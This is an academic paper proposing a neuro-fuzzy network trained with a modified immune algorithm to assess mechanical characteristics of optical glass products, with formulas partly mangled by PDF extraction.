Abstract. The priority tasks within the framework of this paper are the development of the process of intellectual control of mechanical characteristics of optical products, its automation, as well as reducing computational complexity, increasing accuracy and reliability. The aim of the research is to increase the efficiency of control of mechanical characteristics of optical products by using an artificial fuzzy network, which is trained on the basis of an immune algorithm. The artificial neural network for automation of intellectual control of mechanical characteristics of optical products is developed and investigated in the work, which provides representation of knowledge due to control of characteristics of optical products as rules clear to human logic; reduces the RMS error by 2.8–3.1 times and the probability of making the wrong decision by 7–11 times, as well as, in general, the computational complexity of control by automatically selecting the model structure of the artificial fuzzy network, reducing the probability of hitting the local extremum and using technology parallel information processing for the immune algorithm and back propagation in batch mode. The possibility of using the process of intellectual control of mechanical characteristics of optical products in various information and measuring systems is considered. Keywords: optical product · efficiency criteria · neural network · fuzzy inference system · immune algorithm
1 Introduction The use of optical products in various spheres of human activity (household, military, telecommunications, medical, etc.) has recently become increasingly common. The development of renewable energy and resource-saving technologies for the manufacture of modern optical devices and systems is gaining popularity within the concept of sustainable development and the initiative “Industry 4.0” [1]. The most common material used today in the manufacture of most components of optical devices is optical silicate glass. The popularity of such material is due to the significant development of technologies for their production and processing, which allows to obtain high accuracy and cleanliness of work surfaces, while maintaining their properties and characteristics for a long time under the influence of external factors. In addition, the components of optical devices can control the parameters of the optical © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 113–127, 2023. https://doi.org/10.1007/978-3-031-35467-0_8
114
I. Makarenko et al.
medium or light wave when interacting with electromagnetic fields of light, infrared, ultraviolet and other ranges (change light transmission, generate coherent radiation, etc.) [2]. At the same time, the issue of highly effective control of mechanical characteristics of optical products (modulus of elasticity, toughness, strength, high compressive strength, low tensile and flexural strength, etc.) is acute due to the specifics of the use of such products in the environment (often aggressive and extreme), especially in critical applications (energy, space, military, medical and others). It is known [3] that various methods are used to measure the mechanical characteristics of optical products, which, in turn, are divided into static, dynamic and analytical ones. However, the current information and measurement systems (IMS) of mechanical characteristics of optical products, based on these methods, have certain disadvantages, namely: insufficient efficiency in making decisions to meet consumer requirements for different tasks [4]. The effectiveness of the control of mechanical characteristics of optical products by traditional methods and means is significantly influenced by stochastic environmental factors, for which there are no unambiguous laws that can be described by the methods of classical logic and set theory. At the same time, the significant complexity, efficiency and mass of control cycles require the use of modern approaches involving neural network technologies. Currently, artificial intelligence methods are used to control the characteristics of optical products, while the most popular are artificial neural networks, the advantages of which are the following [5–7]: • the possibility of their training and adaptation; • the ability to identify patterns in the data, their generalization, i.e. the extraction of knowledge from the data, which requires knowledge of the object (for example, its mathematical model); • parallel processing of information, which increases their computing power. At the same time [8–10], it should be noted such shortcomings of neural networks as: • difficulties in determining the structure of the network, as there are no algorithms for calculating the number of layers and neurons in each layer for specific applications; • the problem of forming a representative sample; • high probability of the method of learning and adaptation to the local extreme; • inaccessibility for human understanding of the accumulated knowledge network (it is impossible in the form of rules to imagine the relationship between input and output data), because it is distributed among all elements of the neural network and is presented in the form of its weights. Recently, neural networks have been combined with fuzzy inference systems, which, according to the authors A. Rotshtein, S. Shtovba, I. Mostav [11, 12] allows to present knowledge as rules that are easily accessible to human understanding; there is no need for accurate estimation of variable objects (incompleteness and inaccuracy of data). However, the authors S. Abe, L.H. Tsoukalas, R.E. Uhrig [13, 14] have noted the shortcomings of fuzzy inference systems, namely: the impossibility of their learning and adaptation
Intellectual Control of Mechanical Characteristics of Optical Products
115
(there is no possibility of automatic adjustment of the parameters of the membership functions); the impossibility of parallel processing of information, which increases the computing power. At the same time, the authors E.E. Fedorov, T.Yu. Utkina, D.A. Harder, W.M. Lukashenko, Z.J. Czech have shown [15–17] that metaheuristics and, in particular, immune algorithms can be used instead of neural network learning algorithms, the main advantage of which is that for training neural networks, the probability of the latter falling into a local extremum is reduced. However, according to the results of [18, 19], it should be borne in mind that the disadvantage of immune algorithms for learning neural networks is that the speed and accuracy of the method of finding a solution is lower than other methods of learning neural networks. In connection with the above, according to the authors, promising and relevant in the process of controlling the mechanical characteristics of optical products is the use of artificial fuzzy network, for which training should be conducted using an immune algorithm [5]. The purpose of the study: to increase the control effectiveness indicators (accuracy, reliability and speed) of mechanical characteristics of optical products (modulus of elasticity, impact strength, resistance to external loads, strength limit) through the use of artificial fuzzy network, training of which is carried out on the basis of the immune algorithm. To achieve this goal, it is necessary to solve the following tasks: 1. To create a system of fuzzy control of mechanical characteristics of optical products. 2. To create a mathematical model of an artificial fuzzy network of control over the mechanical characteristics of optical products. 3. To make a choice of criteria of an estimation of efficiency of mathematical model of an artificial neuro-fuzzy network of control of mechanical characteristics of optical products. 4. To identify the parameters of the mathematical model of an artificial fuzzy network for controlling the mechanical characteristics of optical products based on the backpropagation algorithm in batch mode. 5. To identify the parameters of the mathematical model of an artificial fuzzy network to control the mechanical characteristics of optical products based on the immune algorithm.
2 Materials and Methods 2.1 Creation of a Fuzzy Control System of Mechanical Characteristics of Optical Products Creating a system of fuzzy control of mechanical characteristics of optical products involves the following stages [5]: • • • •
formation of linguistic variables; formation of a base of fuzzy rules; fuzzyfication; aggregation of conditions;
116
I. Makarenko et al.
• activation of conclusions; • aggregation of outputs; • defuzzyfication 2.1.1 Formation of Linguistic Variables The following variables have been chosen as clear input ones: modulus of elasticity (x 1 ); impact strength (x 2 ); load resistance (x 3 ); strength limit (x 4 ). The following variables have been chosen as linguistic input ones: the value of the ∼ ∼ modulus of elasticity x˜ 1 with its values α 11 = large, α 12 = small, in which the domains of values re fuzzy sets A˜ 11 = {x1 |μA˜ 11 (x1 )}, A˜ 12 = {x1 |1 − μA˜ 11 (x1 )}; the magnitude of ∼
∼
the impact strength x˜ 2 with its values α 21 = large, α 22 = small, in which the domains of values are fuzzy sets A˜ 21 = {x2 |μA˜ 21 (x2 )}, A˜ 22 = {x2 |1 − μA˜ 21 (x2 )}; the value of load ∼
∼
resistance x˜ 3 with its values α 31 = strong, α 32 = weak, in which the domains of values are fuzzy sets A˜ 31 = {x3 |μA˜ 31 (x3 )}, A˜ 32 = {x3 |1 − μA˜ 31 (x3 )}; the value of the strength ∼
limit x˜ 4 with its values α 41 = high, α˜ 42 = low, in which the domains of values are fuzzy sets A˜ 41 = {x4 |μA˜ 41 (x4 )}, A˜ 42 = {x4 |1 − μA˜ 41 (x4 )}. The number of the action type that changes the mechanical characteristics of optical products y has been chosen as a clear output variable. The action y, which changes the value of mechanical characteristics of optical prod∼
∼
∼
ucts with their values β 1 = increase, β 2 = decrease, β 3 = do not change, in which the domains of values are fuzzy sets B˜ 1 = {y|μB˜ 1 (y)}, B˜ 2 = {y|μB˜ 2 (y)}, B˜ 3 = {y|μB˜ 3 (y)} has been chosen as the linguistic initial variable. 2.1.2 Formation of a Base of Fuzzy Rules The following rules have been chosen as fuzzy rules: ∼ ∼ ∼ ∼ ∼ ∼ 1. R1 : if x˜ 1 is α 11 and x˜ 2 is α 21 and x˜ 3 is α 31 and x˜ 4 is α 41 , then γ is β 1 F 7 ∼ ∼ ∼ ∼ ∼ ∼ 2. R2 : if x˜ 1 is α 12 and x˜ 2 is α 22 and x˜ 3 is α 32 and x˜ 4 is α 42 , then γ is β 2 F 2 ∼ ∼ ∼ ∼ ∼ ∼ 3. R3 : if x˜ 1 is α 11 and x˜ 2 is α 22 and x˜ 3 is α 32 and x˜ 4 is α 42 , then γ is β 2 F 3 ∼ ∼ ∼ ∼ ∼ ∼ 4. R4 : if x˜ 1 is α 11 and x˜ 2 is α 21 and x˜ 3 is α 32 and x˜ 4 is α 42 , then γ is β 3 F 4 ∼ ∼ ∼ ∼ ∼ ∼ 5. R5 : if x˜ 1 is α 11 and x˜ 2 is α 22 and x˜ 3 is α 31 and x˜ 4 is α 42 , then γ is β 3 F 5 ∼ ∼ ∼ ∼ ∼ ∼ 6. R6 : if x˜ 1 is α 11 and x˜ 2 is α 22 and x˜ 3 is α 32 and x˜ 4 is α 41 , then γ is β 3 F 6 ∼ ∼ ∼ ∼ ∼ ∼ 7. R7 : if x˜ 1 is α 11 and x˜ 2 is α 22 and x˜ 3 is α 31 and x˜ 4 is α 41 , then γ is β 1 F 7 ∼ ∼ ∼ ∼ ∼ ∼ 8. R8 : if x˜ 1 is α 12 and x˜ 2 is α 21 and x˜ 3 is α 32 and x˜ 4 is α 42 , then γ is β 2 F 8 ∼ ∼ ∼ ∼ ∼ ∼ 9. R9 : if x˜ 1 is α 12 and x˜ 2 is α 21 and x˜ 3 is α 31 and x˜ 4 is α 42 , then γ is β 3 F 9 ∼ ∼ ∼ ∼ ∼ ∼ 10. R10 : if x˜ 1 is α 12 and x˜ 2 is α 21 and x˜ 3 is α 32 and x˜ 4 is α 41 , then γ is β 1 F 10 ∼ ∼ ∼ ∼ ∼ ∼ 11. R11 : if x˜ 1 is α 11 and x˜ 2 is α 21 and x˜ 3 is α 32 and x˜ 4 is α 41 , then γ is β 1 F 11 ∼ ∼ ∼ ∼ ∼ ∼ 12. R12 : if x˜ 1 is α 12 and x˜ 2 is α 22 and x˜ 3 is α 31 and x˜ 4 is α 42 , then γ is β 3 F 12
Intellectual Control of Mechanical Characteristics of Optical Products
117
∼ ∼ ∼ ∼ ∼ ∼ 13. R13 : if x˜ 1 is α 12 and x˜ 2 is α 22 and x˜ 3 is α 31 and x˜ 4 is α 41 , then γ is β 1 F 13 ∼ ∼ ∼ ∼ ∼ ∼ 14. R14 : if x˜ 1 is α 12 and x˜ 2 is α 21 and x˜ 3 is α 31 and x˜ 4 is α 41 , then γ is β 1 F 14 ∼ ∼ ∼ ∼ ∼ ∼ 15. R15 : if x˜ 1 is α 12 and x˜ 2 is α 22 and x˜ 3 is α 32 and x˜ 4 is α 41 , then γ is β 3 F 15 ∼ ∼ ∼ ∼ ∼ 16. R16 : if x˜ 1 is α 11 and x˜ 2 is α 21 and x˜ 3 is α 31 and x˜ 4 isα 42 , then γ˜ is β 3 F 16
where F r are the coefficients of fuzzy rules Rr .
∼
The formed base of fuzzy rules allows to describe all possible values of the action γ that changes the value of mechanical characteristics of optical products from the values of the input variables of these characteristics. 2.1.3 Fuzzyfication
Determine the degree of truth of each condition of each rule, using the membership function μA˜ ij (xi ). The Gaussian function has been chosen as a function of the condition (the advantages of using which are the ability to specify the area where the function will always acquire the value 1, as well as the ability to specify a gradual change of the function in the areas to the left and right of the fuzzy set kernel) 1 xi − mi1 2 (1) , i ∈ 1, 4, μA˜ i1 (xi ) = exp − 2 σi1 μA˜ i2 (xi ) = 1 − μA˜ i1 (xi ), i ∈ 1, 4, where mij is the mathematical expectation, σij is the standard deviation. 2.1.4 Aggregation of Conditions The membership function of the condition for each rule is defined as: 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. 13. 14. 15.
μA˜ 1 (x) = min{μA˜ 11 (x1 ), μA˜ 21 (x2 ), μA˜ 31 (x3 ), μA˜ 41 (x4 )} μA˜ 2 (x) = min{μA˜ 12 (x1 ), μA˜ 22 (x2 ), μA˜ 32 (x3 ), μA˜ 42 (x4 )} μA˜ 3 (x) = min{μA˜ 11 (x1 ), μA˜ 22 (x2 ), μA˜ 32 (x3 ), μA˜ 42 (x4 )} μA˜ 4 (x) = min{μA˜ 11 (x1 ), μA˜ 21 (x2 ), μA˜ 32 (x3 ), μA˜ 42 (x4 )} μA˜ 5 (x) = min{μA˜ 11 (x1 ), μA˜ 22 (x2 ), μA˜ 31 (x3 ), μA˜ 42 (x4 )} μA˜ 6 (x) = min{μA˜ 11 (x1 ), μA˜ 22 (x2 ), μA˜ 32 (x3 ), μA˜ 41 (x4 )} μA˜ 7 (x) = min{μA˜ 11 (x1 ), μA˜ 22 (x2 ), μA˜ 31 (x3 ), μA˜ 41 (x4 )} μA˜ 8 (x) = min{μA˜ 12 (x1 ), μA˜ 21 (x2 ), μA˜ 32 (x3 ), μA˜ 42 (x4 )} μA˜ 9 (x) = min{μA˜ 12 (x1 ), μA˜ 21 (x2 ), μA˜ 31 (x3 ), μA˜ 42 (x4 )} μA˜ 10 (x) = min{μA˜ 12 (x1 ), μA˜ 21 (x2 ), μA˜ 32 (x3 ), μA˜ 41 (x4 )} μA˜ 11 (x) = min{μA˜ 11 (x1 ), μA˜ 21 (x2 ), μA˜ 32 (x3 ), μA˜ 41 (x4 )} μA˜ 12 (x) = min{μA˜ 12 (x1 ), μA˜ 22 (x2 ), μA˜ 31 (x3 ), μA˜ 42 (x4 )} μA˜ 13 (x) = min{μA˜ 12 (x1 ), μA˜ 22 (x2 ), μA˜ 31 (x3 ), μA˜ 41 (x4 )} μA˜ 14 (x) = min{μA˜ 12 (x1 ), μA˜ 21 (x2 ), μA˜ 31 (x3 ), μA˜ 41 (x4 )} μA˜ 15 (x) = min{μA˜ 12 (x1 ), μA˜ 22 (x2 ), μA˜ 32 (x3 ), μA˜ 41 (x4 )},
(2)
118
I. Makarenko et al.
16. μA˜ 16 (x) = min{μA˜ 11 (x1 ), μA˜ 21 (x2 ), μA˜ 31 (x3 ), μA˜ 42 (x4 )} As can be seen from the above, the membership function of the condition for each rule has been chosen under the conditions of minimizing the membership functions of the relevant input variables, which guarantees compliance with the main condition of the task, namely: increasing the effectiveness of controlling the mechanical characteristics of optical products by reducing the discrepancy between experimentally obtained values and results of fuzzy modeling. 2.1.5 Activation of Outputs The membership function of each rule is defined as follows: 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. 13. 14. 15. 16.
μC˜ 1 (x, z) = min{μA˜ 1 (x), μB˜ 1 (z)}F 1 μC˜ 2 (x, z) = min{μA˜ 2 (x), μB˜ 2 (z)}F 2 μC˜ 3 (x, z) = min{μA˜ 3 (x), μB˜ 2 (z)}F 3 μC˜ 4 (x, z) = min{μA˜ 4 (x), μB˜ 3 (z)}F 4 μC˜ 5 (x, z) = min{μA˜ 5 (x), μB˜ 3 (z)}F 5 μC˜ 6 (x, z) = min{μA˜ 6 (x), μB˜ 3 (z)}F 6 μC˜ 7 (x, z) = min{μA˜ 7 (x), μB˜ 1 (z)}F 7 μC˜ 8 (x, z) = min{μA˜ 8 (x), μB˜ 2 (z)}F 8 μC˜ 9 (x, z) = min{μA˜ 9 (x), μB˜ 3 (z)}F 9 μC˜ 10 (x, z) = min{μA˜ 10 (x), μB˜ 1 (z)}F 10 μC˜ 11 (x, z) = min{μA˜ 11 (x), μB˜ 1 (z)}F 11 μC˜ 12 (x, z) = min{μA˜ 12 (x), μB˜ 3 (z)}F 12 μC˜ 13 (x, z) = min{μA˜ 13 (x), μB˜ 1 (z)}F 13 μC˜ 14 (x, z) = min{μA˜ 14 (x), μB˜ 1 (z)}F 14 μC˜ 15 (x, z) = min{μA˜ 15 (x), μB˜ 3 (z)}F 15 μC˜ 16 (x, z) = min{μA˜ 16 (x), μB˜ 3 (z)}F 16 In this paper, membership functions μBk (z) and weights of fuzzy rules F r are defined
as
μBk (z) = [z = k] =
1, z = k , k ∈ 1, 3, F 1 = . . . = F 16 = 1. 0, z = k
(3)
2.1.6 Aggregation of Outputs The membership function of the final output is determined as follows: μC˜ (x, z) = max{μC˜ 1 (x, z), . . . , μC˜ 16 (x, z)}, z ∈ 1, 3.
(4)
The finally obtained membership function of the final derivation is the result of the maximization of the membership functions of the stacking of each rule, which allows to obtain the maximum increase in the efficiency of control of mechanical characteristics of optical products.
Intellectual Control of Mechanical Characteristics of Optical Products
119
2.1.7 Defuzzyfication To obtain the number of the type of action that changes the value of mechanical characteristics of optical products, the method of maximum membership function is used z ∗ = arg max μC˜ (x, z), z ∈ 1, 3. z
(5)
As a result of using this method, we get the number of the type of action, which maximally changes the mechanical characteristics of optical products. 2.2 Creation of a Mathematical Model of an Artificial Fuzzy Control Network of Mechanical Characteristics of Optical Products On the basis of the system of fuzzy control of mechanical characteristics of optical products, a mathematical model of an artificial fuzzy network is proposed in the work, the structure of which is presented in the form of a graph in Fig. 1.
Fig. 1. The structure of the model of an artificial fuzzy network in the form of a graph
The input (zero) layer contains four neurons (corresponds to the number of input variables). The first hidden layer implements fuzzyfication and contains eight neurons (corresponds to the number of values of linguistic input variables). The second hidden layer implements aggregation of conditions and contains sixteen neurons (corresponds to the number of fuzzy rules). The third hidden layer activates the activation of outputs and contains sixteen neurons (corresponds to the number of fuzzy rules). The output (fourth) layer implements the aggregation of outputs and contains three neurons (corresponds to the number of values of the linguistic output variable). The operation of the artificial fuzzy network is presented as follows. The first layer calculates the membership functions of the conditions: 1 xi − mi1 2 (6) , i ∈ 1, 4, μA˜ i1 (xi ) = exp − 2 σi1
120
I. Makarenko et al.
μA˜ i2 (xi ) = 1 − μA˜ i1 (xi ), i ∈ 1, 4.
(7)
The second layer calculates the membership functions of the conditions based on the min-max of the neuron:
μA˜ r (x) = min max wijr μA˜ ij (xi ) , i ∈ 1, 4, j ∈ 1, 2, r ∈ 1, 16 (8) i
j
1 1 1 1 1 1 1 1 w11 = 1, w12 = 0, w21 = 1, w22 = 0, w31 = 1, w32 = 0, w41 = 1, w42 =0 2 2 2 2 2 2 2 2 w11 = 0, w12 = 1, w21 = 0, w22 = 1, w31 = 0, w32 = 1, w41 = 0, w42 =1 3 3 3 3 3 3 3 3 w11 = 1, w12 = 0, w21 = 0, w22 = 1, w31 = 0, w32 = 1, w41 = 0, w42 =1 4 4 4 4 4 4 4 4 w11 = 1, w12 = 0, w21 = 1, w22 = 0, w31 = 0, w32 = 1, w41 = 0, w42 =1 5 5 5 5 5 5 5 5 w11 = 1, w12 = 0, w21 = 0, w22 = 1, w31 = 1, w32 = 0, w41 = 0, w42 =1 6 6 6 6 6 6 6 6 w11 = 1, w12 = 0, w21 = 0, w22 = 1, w31 = 0, w32 = 1, w41 = 1, w42 =0 7 7 7 7 7 7 7 7 w11 = 1, w12 = 0, w21 = 0, w22 = 1, w31 = 1, w32 = 0, w41 = 1, w42 =0 8 8 8 8 8 8 8 8 w11 = 0, w12 = 1, w21 = 1, w22 = 0, w31 = 0, w32 = 1, w41 = 0, w42 =1 9 9 9 9 9 9 9 9 w11 = 0, w12 = 1, w21 = 1, w22 = 0, w31 = 1, w32 = 0, w41 = 0, w42 =1 10 10 10 10 10 10 10 10 w11 = 0, w12 = 1, w21 = 1, w22 = 0, w31 = 0, w32 = 1, w41 = 1, w42 =0 11 11 11 11 11 11 11 11 w11 = 1, w12 = 0, w21 = 1, w22 = 0, w31 = 0, w32 = 1, w41 = 1, w42 =0 12 12 12 12 12 12 12 12 w11 = 0, w12 = 1, w21 = 0, w22 = 1, w31 = 1, w32 = 0, w41 = 0, w42 =1 13 13 13 13 13 13 13 13 w11 = 0, w12 = 1, w21 = 0, w22 = 1, w31 = 1, w32 = 0, w41 = 1, w42 =0 14 14 14 14 14 14 14 14 w11 = 0, w12 = 1, w21 = 1, w22 = 0, w31 = 1, w32 = 0, w41 = 1, w42 =0 15 15 15 15 15 15 15 15 w11 = 0, w12 = 1, w21 = 0, w22 = 1, w31 = 0, w32 = 1, w41 = 1, w42 =0 16 16 16 16 16 16 16 16 w11 = 1, w12 = 0, w21 = 1, w22 = 0, w31 = 1, w32 = 0, w41 = 0, w42 =1
Intellectual Control of Mechanical Characteristics of Optical Products
121
The third layer calculates the membership functions derived from the min neuron: μC˜ r (x, z) = wr min{μA˜ r (x), μB˜ r (z)}, z ∈ 1, 3, r ∈ 1, 16
(9)
where wr = F r . In the fourth layer, the membership functions of the final output are calculated based on the max neuron: yz = μC˜ (x, z) = max wrz μC˜ r (x, z) , z ∈ 1, 3, r ∈ 1, 16 (10) r
w11 = 1, w21 = 0, w31 = 0, w41 = 0, w51 = 0, w61 = 0, w71 = 1, w81 = 0, w91 = 0, 1 = 1, w 1 = 1, w 1 = 0, w 1 = 1, w 1 = 1, w 1 = 0, w 1 = 0 w10 11 12 13 14 16 15 w12 = 0, w22 = 1, w32 = 1, w42 = 0, w52 = 0, w62 = 0, w72 = 0, w82 = 1, w92 = 0, 2 = 0, w 2 = 0, w 2 = 0, w 2 = 0, w 2 = 0, w 2 = 0, w 2 = 0 w10 11 12 13 14 16 15 w13 = 0, w23 = 0, w33 = 0, w43 = 1, w53 = 1, w63 = 1, w73 = 0, w83 = 0, w93 = 1, 3 = 0, w 3 = 0, w 3 = 1, w 3 = 0, w 3 = 0, w 3 = 1, w 3 = 1 w10 11 12 13 14 16 15 Thus, the mathematical model of an artificial fuzzy network based on min-max neurons is presented in the form:
z r r yz = μC˜ (x, z) = max wr w min min max wij μA˜ ij (xi ) , μB˜ r (z) , z ∈ 1, 3. (11) r∈1,16
i∈1,4 j∈1,2
To make a decision on the choice of an action that changes the size of the stock buffer, for model (11) the membership function maximum method is used: z ∗ = arg max yz = arg max μC˜ (x, z), z ∈ 1, 3. z
z
(12)
2.3 Selection of Criteria for Evaluating the Effectiveness of a Mathematical Model of an Artificial Fuzzy Control Network of Mechanical Characteristics of Optical Products To evaluate the parametric identification of the mathematical model of an artificial fuzzy network (11), the following has been selected: • accuracy criterion, which means the choice of such parameter values θ = (m11 , m21 , m31 , m41 , σ11 , σ21 , σ31 , σ41 ), which deliver a minimum of standard error (the difference between the output of the model and the desired output): F=
1 P 3 (ypz − dpz )2 → min, p=1 z=1 θ 3P
where d pz is the response received from the control object, d pz ∈ {0, 1},
(13)
122
I. Makarenko et al.
ypz is feedback received on the model, P is the number of test implementations; • criterion of reliability, which means the choice of such values of parameters θ = (m11 , m21 , m31 , m41 , σ11 , σ21 , σ31 , σ41 ), which give the minimum probability of making the wrong decision (the difference between the output of the model and the desired output): 1 P F= (14) arg max ypz = arg max dpz → min, p=1 θ P z∈1,3 z∈1,3 ⎧ ⎪ ⎨ 1, arg max yz = arg max dpz z∈1,3 z∈1,3 arg max yz = arg max dpz = ; ⎪ z∈1,3 z∈1,3 ⎩ 0, arg max yz = arg max dpz z∈1,3
z∈1,3
• performance criterion, which means the choice of such parameter values θ = (m11 , m21 , m31 , m41 , σ11 , σ21 , σ31 , σ41 ), which have the minimum of computational complexity: F = T → min . θ
(15)
2.4 Identification of Parameters of the Mathematical Model of Artificial Neuro-Fuzzy Network of Control of Mechanical Characteristics of Optical Products on the Basis of Algorithm of Inverse Propagation in Batch Mode Identification of parameters of the mathematical model of artificial neuro-fuzzy network of control of mechanical characteristics of optical products (11) involves the following steps: 1. Initialization by means of uniform distribution on the interval (0, 1) of mathematical expectations mij , standard deviations σij , i ∈ 1, 4, j ∈ 1, 2. 2. Setting the training set {(xp , d p )|xp ∈ R4 , d p ∈ {0, 1}3 }, p ∈ 1, P, where xp is the p-th training input vector, d p is the p-th training output vector, P is the power of the training set. Iteration number n = 1. 3. Calculation of the output signal according to model (11) (direct)):
z r r ypz = μC˜ (xp , z) = max wr w min min max wij μA˜ ij (xpi ) , μB˜ r (z) , z ∈ 1, 3. r∈1,16
i∈1,4 j∈1,2
4. Calculation of artificial neural network (ANN) error energy based on the criterion (13) 1 P 3 (ypz − dpz )2 . F= p=1 z=1 3P 5. Adjusting the parameters of the membership function of the model conditions (11) (reverse): ∂E ∂E , i ∈ 1, 4, mi1 = mi1 − η , i ∈ 1, 4; σi1 = σi1 − η ∂mi1 ∂σi1 (n) where η is a parameter that determines the speed of training (with a large value of η training is faster, but the risk of getting the wrong decision increases), 0 < η < 1. 6. Checking the completion condition. If E > ε, then n = n + 1, there is a transition to point 3. The value of ε is calculated experimentally.
Intellectual Control of Mechanical Characteristics of Optical Products
123
2.5 Identification of Parameters of the Mathematical Model of Artificial Neuro-Fuzzy Network of Control of Mechanical Characteristics of Optical Products on the Basis of Immune Algorithm The authors have proposed an immune algorithm “modified artificial immune network” (MAIN). The essence of the modification is that at the stage of compression in the compressible set the neighborhoods of cells are not calculated, the value of the value function (objective function) is less than the best average value for all iterations, which reduces the computational complexity of the algorithm. Identification of parameters of the mathematical model of artificial neuro-fuzzy network of control of mechanical characteristics of optical products (11) on the basis of the proposed immune algorithm involves the following steps. 1. Initialization. • Setting the mutation parameter ε, the compression threshold α, and α > 0 (the greater α, the lower the probability of mutation), ε > 0. • Setting the maximum number of iterations N, population size K, cell length M, number of L C clones, minimum and maximum values for cell xjmin , xjmax , j ∈ 1, M . • Setting the value function (objective function) based on (13) F(x) → min, x
where x is a cell (valid vector). • Creating a source population P. – Cell number k = 1, P = ∅. – Randomly creating a cell: xk = (xk1 , . . . , xkM ), xkj = xjmin + (xjmax − xjmin )U (0, 1), where U(0,1) is a function that returns a uniformly distributed random number in the range [0, 1]. – If x k ∈ / P, then P = P ∪ {x k }, k = k + 1. – If k ≤ K, then go to step 1.4.2 • Determining the best cell by the objective function: x∗ = arg min F(xk ). xk
• The best average value for all iterations: 1 K best F = F(xk ). k=1 K 2. Iteration number n = 0. 3. Calculation of affinity of population cells P F(xk ) − min F(xi ) Φ(xk ) = 1 −
i∈1,K
max F(xi ) − min F(xi )
i∈1,K
i∈1,K
, Φ(xk ) ∈ [0, 1], k ∈ 1, K.
124
I. Makarenko et al.
4. Determining the best cell by the objective function: k ∗ = arg min F(xk ). k
5. If F(xk ∗ ) < F(x∗ ), then x∗ = xk ∗ 6. Calculating the average cost F
source
=
1 K F(xk ). k=1 K
7. Creating a set of the best mutated clones H: • k = 1, H = ∅. • Creating a set of clones P˜ k = {˜xkl } or a cell of the population x k .
• Creating a set P k of mutated clones.
– Clone number l = 1, P k = ∅.
– x klj = x˜ klj + α1 e−Φ(˜xkl ) N (0, 1), j ∈ 1, M ,where N(0, 1) is a function that returns a standard normally distributed random number. The parameter α can be defined as α −1 = δ(xjmax − xjmin ), 0 < δ < 1.
– x klj = max{xjmin , x klj }, x klj = min{xjmax , x klj }, j ∈ 1, M .
– P k = P k ∪ { x kl }. – If l < L C , then l = l + 1, go to step 7.3.2.
• Determining the best element of the set P k by the objective function: hk =
arg min F( x kl ):
x kl
• H = H ∪ {hk }. • If k < K, then k = k + 1, go to step 7.2. 8. Calculation of the average value: F mutate
mutate
=
1 K F(hk ). i=1 K
source
9. If F ≥F , then go to the step 7. source best best source < F , then F =F . 10. If F 11. Compression of the set H and replacement of cells of the population P by elements of the set H. • k = 1, m = 1. best • If F(hm ) > F , then go to the step 11.5. • Formation of the ε-neighborhood of the m-th element of the set H. Uhm ,ε = {hl |ρ(hm , hl ) ≤ ε, l ∈ 1, K}, where ρ is the distance between hm and hl (for example, the Euclidean distance): • If |Uhm ,ε | = ∅ or maxUhm ,ε = hm , then x k = hm , k = k + 1.
Intellectual Control of Mechanical Characteristics of Optical Products
125
• If m < K, then m = m + 1, go to the step 11.2. 12. If k = K, then go to the step 14. 13. Initialization of the last cells of the population P: min • xk = (xk1 , ..., xkM ), xkj = xmin + (xmax j −x j )U (0, 1). j • If k < K, then k = k + 1, go to the step 13.1.
14. If n < N – 1, then n = n + 1, go to the step 3. The result is x * . 2.6 Numerical Research Numerical study of the proposed mathematical models of artificial neural fuzzy network and conventional multilayer perceptron has been conducted in Matlab using Deep Learning Toolbox (to identify the parameters of the model of conventional multilayer perceptron based on inverse propagation), Global Optimization Toolbox (to identify the model networks (11) based on the immune algorithm (modified artificial immune network (MAIN)), Fuzzy Logic Toolbox (to identify the parameters of the proposed model of artificial fuzzy network (11)) on the basis of inverse propagation). Table 1 presents computational difficulties, RMS errors, probabilities of incorrect decisions to control the mechanical properties of optical products, obtained from STATISTICA Neural Networks data (statSoft neural network package, which is the implementation of the whole set of neural network data analysis methods) using an artificial neural network such as a multilayer perceptron (MLP) with back propagation (BP) and an immune algorithm “modified artificial immune network” (MAIN), and the proposed model (11) with back propagation (BP) and an immune algorithm “modified artificial immune network” (MAIN) respectively. The MLP had 2 hidden layers (each consisting of 8 neurons, as well as the input layer). According to Table 1, the best results are given by the model (11) with the identification of parameters based on MAIN. Based on the experiments, the following conclusions can be drawn. The procedure of identification of parameters based on the immune algorithm “modified artificial immune network” (MAIN) is more effective than the method of training based on back propagation by reducing the probability of hitting the local extremum, automatic selection of the artificial fuzzy network model and parallel information processing technology. As a result of research, comparative analysis of the results obtained in the artificial fuzzy control network of mechanical characteristics of optical products with the results obtained using an alternative neural network, such as multilayer perceptron with back propagation (which has proven itself in high-precision control), has shown significant simplification, reduction of the root mean square error from the value of 28.8–33.2 to the value of 9.3–11.5 and the probability of incorrect decisions from the value of 0.089–0.112 to the value of 0.008–0.013.
126
I. Makarenko et al.
Table 1. Computational complexity, standard error, probability of incorrect decisions made to control the mechanical characteristics of optical products Model and method of parameter identification
RMS errors
The probability of making the wrong decision
Computational complexity
Normal MLP with BP in serial mode
33.2
0.112
T = PN
Normal MLP with MAIN without concurrency
28.8
0.089
T = PNI
Author’s model (11) with BP in batch mode
11.5
0.013
T=N
9.3
0.008
T=N
Author’s model (11) with MAIN with parallelism
3 Conclusions 1. To solve the problem of improving the efficiency of control of mechanical characteristics of optical products, appropriate methods of artificial intelligence have been studied. These studies have shown that to date, the most effective is the use of artificial neural networks in combination with fuzzy inference and immune algorithm. 2. The proposed approach to the intellectual control of mechanical characteristics of optical products automates the process of such control; provides knowledge of the control of the characteristics of optical products, as rules that are easily accessible to human understanding; reduces computational complexity, rms error by 2.8–3.1 times and the probability of making the wrong decision by 7–11 times by automatically selecting the structure of the artificial neural fuzzy network model, reducing the probability of hitting the local extremum and using parallel information processing technology for the immune algorithm and batch back propagation. 3. The developed method of intellectual control of mechanical characteristics of optical products can be used in various information and measuring systems, for example, the information and measurement unit that has been implemented in the multiprobe system for nanometric measurements of geometrical and mechanical properties of microsystem devices [3].
References 1. Zheng, T., Ardolino, M., Bacchetti, A., Perona, M.: The applications of Industry 4.0 technologies in manufacturing context: a systematic literature review. Int. J. Prod. Res. 59(6), 1922–1954 (2020). https://doi.org/10.1080/00207543.2020.1824085 2. Grechana, O., Kovalenko, Yu., Bondarenko, M.: Gradient microstructures formed by electron flow on the optical glass. In: Abstract of the IX International Conference on the Complex Safety of Technological Processes and Systems, Chernigiv (2019)
